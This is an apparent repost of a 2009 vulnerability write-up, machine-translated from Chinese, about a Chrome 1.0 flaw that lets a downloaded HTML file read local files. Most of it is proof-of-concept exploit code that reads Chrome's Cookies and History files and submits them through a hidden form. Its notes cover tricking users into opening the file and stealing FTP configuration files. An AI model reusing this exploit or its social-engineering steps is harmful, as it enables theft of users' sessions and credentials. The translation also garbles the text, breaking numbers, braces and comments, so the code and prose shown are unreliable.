Lucene search

HistoryApr 23, 2009 - 12:00 a.m.

Google Chrome used ajax to read a local file vulnerability-vulnerability warning-the black bar safety net


Author: the emptiness of the prodigal son heart

google’s browser Chrome1. 0. 1 5 4. 5 3 currently the latest, and the presence of ajax to read a local file vulnerability.
Using this vulnerability you can read a local text file and submit it.

And Chrome the cookie is saved by default in the“C:\Documents and Settings\administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies”

Chrome’s history is stored in"C:\Documents and Settings\administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\History"

Read this file, and then submit, the premise is the file in the local open, but how to deceive the user in the local open?

See the code:


Chrome use ajax to read local txt file and upload exp

author [email protected] 2009-4-22 get cookie and save.

header(“Content-Disposition: attachment;filename=kxlzx.htm”);
header(“Content-type: application/kxlzx”);

set header, so just download the html file,and open it at local.

<form id=“form” action=“” method=“POST”>
<input id=“input” name=“cookie” value=“” type=“hidden”>
the <script>
function doMyAjax(user)
var time = Math. random();

the cookies at C:\Documents and Settings\kxlzx\Local Settings\Application Data\Google\Chrome\User Data\Default
and the history at C:\Documents and Settings\kxlzx\Local Settings\Application Data\Google\Chrome\User Data\History
and so on…
var strPer = ‘file://localhost/C:/Documents and Settings/’+user+‘/Local Settings/Application Data/Google/Chrome/User Data/Default/Cookies? time=’+time;



function Enshellcode(txt)
var url=new String(txt);
var i=0,l=0,k=0,curl=“”;
l= url. length;
k=url. charCodeAt(i);
if(k<1 6)curl+=“0”+k. toString(1 6);else curl+=k. toString(1 6);}
if (l%2){curl+=“0 0”;}else{curl+=“0 0 0 0”;}
curl=curl. replace(/(…)(…)/g,“%u$2$1”);
return curl;

var xmlHttp;
function createXMLHttp(){
if(window. XMLHttpRequest){
xmlHttp = new XMLHttpRequest();
else if(window. ActiveXObject){
xmlHttp = new ActiveXObject(“Microsoft. XMLHTTP”);

function startRequest(doUrl){


xmlHttp. onreadystatechange = handleStateChange;

xmlHttp. open(“GET”, doUrl, true);

xmlHttp. send(null);


function handleStateChange(){
if (xmlHttp. readyState == 4 ){
var strResponse = “”;
setTimeout(“framekxlzxPost(xmlHttp. responseText)”, 3 0 0 0);


function framekxlzxPost(text)
document. getElementById(“input”). value = Enshellcode(text);
document. getElementById(“form”). submit();



Note that the code to upload the TXT before, has to do the encryption, in order to ensure the integrity of the file, specifically decryption, see


Select the shellcode decryption

The browser will automatically lower in this html file, 保存为kxlzx.htm the.

! 1

After downloading, the user will certainly go to see download what, open the htm in the local town.

Open after executing the JS, the local cookies, history, etc. can be customized, and uploaded to the malicious users to develop place.

The POC may be based on the actual situation improved. There is the following note:

Some points to note:
1, not necessarily read the cookie, you can also read other things, such as ftp software ini configuration file, etc., as long as the txt can be read.
2, Read the cookie must predict the local user name, but many people are is administrator.
3, anyway, ajax is asynchronous, you can simultaneously call several methods.
4, or you can send any want to a local TXT file.

In fact, this vulnerability and I previously made the opera a local read vulnerability is a grain of truth.

However will than his serious point,because of the Chrome’s cookie file address is fixed.